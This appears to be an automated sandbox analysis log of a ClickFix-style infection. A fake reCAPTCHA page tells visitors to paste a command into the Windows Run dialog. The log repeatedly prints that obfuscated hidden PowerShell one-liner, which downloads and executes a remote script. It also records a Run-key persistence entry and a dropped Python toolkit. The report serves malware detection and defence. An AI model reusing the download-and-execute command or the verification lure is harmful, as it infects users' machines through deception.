Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
Source: vcruntime140_1.dll.20.dr Static PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
Source: cli.exe.24.dr Static PE information: real checksum: 0x0 should be: 0x3aa1
Source: wheel.exe.24.dr Static PE information: real checksum: 0x2a492 should be: 0x24951
Source: pip3.11.exe.24.dr Static PE information: real checksum: 0x2a492 should be: 0x22fdc
Source: cli-arm64.exe.24.dr Static PE information: real checksum: 0x0 should be: 0x79fa
Source: pip3.exe.24.dr Static PE information: real checksum: 0x2a492 should be: 0x22fdc
Source: cli-32.exe.24.dr Static PE information: real checksum: 0x0 should be: 0x3aa1
Source: cli-64.exe.24.dr Static PE information: real checksum: 0x0 should be: 0x5e39
Source: pip.exe.24.dr Static PE information: real checksum: 0x2a492 should be: 0x22fdc
Source: python311.dll.20.dr Static PE information: section name: PyRuntim
Source: vcruntime140.dll.20.dr Static PE information: section name: fothk
Source: vcruntime140.dll.20.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.20.dr Static PE information: section name: .00cfg
Source: libssl-3.dll.20.dr Static PE information: section name: .00cfg

Persistence and Installation Behavior

Source: Chrome DOM: 4.6 OCR Text: REGION SELECTOR It looks like you are visiting us from outside the IJS Would you prefer to access our dedicated Euro ean website, which offers tailored, region-specific in Complete these Verification Steps To better prove you are not a robot, please: Press & hold the Windows Key + R. 1. 2. In the verification window, press Ctrl + V. ENGLISH 3. Press Enter on your keyboard to finish. You will observe and agree: "1 at, not - reCAPTCHA Perfrm the steps above to VERIFY finish verification.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_msi.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_queue.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\unicodedata.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_multiprocessing.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_hashlib.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_ssl.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\python.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\python311.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_sqlite3.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_socket.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\winsound.pyd
Source: C:\Temp\PyEnv\python.exe File created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-arm64.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\select.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\sqlite3.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\libssl-3.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_ctypes.pyd
Source: C:\Temp\PyEnv\python.exe File created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-32.exe
Source: C:\Temp\PyEnv\python.exe File created: C:\Temp\PyEnv\Scripts\pip3.11.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_decimal.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_zoneinfo.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_asyncio.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_elementtree.pyd
Source: C:\Temp\PyEnv\python.exe File created: C:\Temp\PyEnv\Scripts\pip3.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_uuid.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_lzma.pyd
Source: C:\Temp\PyEnv\python.exe File created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_overlapped.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\vcruntime140.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\pythonw.exe
Source: C:\Temp\PyEnv\python.exe File created: C:\Temp\PyEnv\Scripts\wheel.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\vcruntime140_1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_bz2.pyd
Source: C:\Temp\PyEnv\python.exe File created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-64.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\pyexpat.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\libffi-8.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\libcrypto-3.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\python3.dll
Source: C:\Temp\PyEnv\python.exe File created: C:\Temp\PyEnv\Scripts\pip.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\LICENSE.txt

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyPower powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Temp\PyEnv\python.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFF7FE406AA rdtsc 19_2_00007FFF7FE406AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8778
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1092
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2043
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7781
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 1665
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_msi.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_queue.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\unicodedata.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_ssl.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_hashlib.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_multiprocessing.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_sqlite3.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_socket.pyd
Source: C:\Temp\PyEnv\python.exe Dropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-arm64.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\winsound.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\select.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\sqlite3.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_ctypes.pyd
Source: C:\Temp\PyEnv\python.exe Dropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-32.exe
Source: C:\Temp\PyEnv\python.exe Dropped PE file which has not been started: C:\Temp\PyEnv\Scripts\pip3.11.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_decimal.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_zoneinfo.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_asyncio.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_elementtree.pyd
Source: C:\Temp\PyEnv\python.exe Dropped PE file which has not been started: C:\Temp\PyEnv\Scripts\pip3.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_uuid.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_lzma.pyd
Source: C:\Temp\PyEnv\python.exe Dropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_overlapped.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\pythonw.exe
Source: C:\Temp\PyEnv\python.exe Dropped PE file which has not been started: C:\Temp\PyEnv\Scripts\wheel.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\vcruntime140_1.dll
Source: C:\Temp\PyEnv\python.exe Dropped PE file which has not been started: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-64.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\_bz2.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\pyexpat.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Temp\PyEnv\python3.dll
Source: C:\Temp\PyEnv\python.exe Dropped PE file which has not been started: C:\Temp\PyEnv\Scripts\pip.exe
Source: C:\Temp\PyEnv\python.exe API coverage: 0.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3208 Thread sleep count: 8778 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3208 Thread sleep count: 1092 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3252 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2532 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2892 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFF7F442F0F GetSystemInfo, 19_2_00007FFF7F442F0F
Source: powershell.exe, 00000013.00000002.1690428797.000001CE4EA36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000014.00000002.2449235586.0000025F44641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: python.exe, 00000018.00000003.2060621815.0000023C7437D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2063316044.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2081360107.0000023C7437A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2123104403.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2067241943.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2075816910.0000023C7437D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2107014994.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2116261303.0000023C7437A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2016923190.0000023C74378000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2120229856.0000023C7437E000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2027368506.0000023C74356000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000013.00000002.1690428797.000001CE4E9A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Temp\PyEnv\python.exe Code function: 24_0_00007FF70C4917B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_0_00007FF70C4917B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Temp\PyEnv\python.exe Code function: 24_0_00007FF70C491964 SetUnhandledExceptionFilter, 24_0_00007FF70C491964
Source: C:\Temp\PyEnv\python.exe Code function: 24_0_00007FF70C4912B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_0_00007FF70C4912B4
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF806880B68 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF806880B68
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF806880240 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00007FF806880240
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF8068A2BC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF8068A2BC0
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF8068A2600 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00007FF8068A2600
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF8068D3CB0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF8068D3CB0
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF8068D36E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00007FF8068D36E0
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF8068FAAA8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF8068FAAA8
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF8068FA060 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00007FF8068FA060
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF806920AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00007FF806920AA8
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF80C831AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF80C831AC0
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF80C8314F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00007FF80C8314F0
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF80C891B00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00007FF80C891B00
Source: C:\Temp\PyEnv\python.exe Code function: 26_2_00007FF80C891530 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 26_2_00007FF80C891530

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" C:\\Temp\PyEnv\get-pip.py
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" -m pip install pycryptodome pypiwin32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
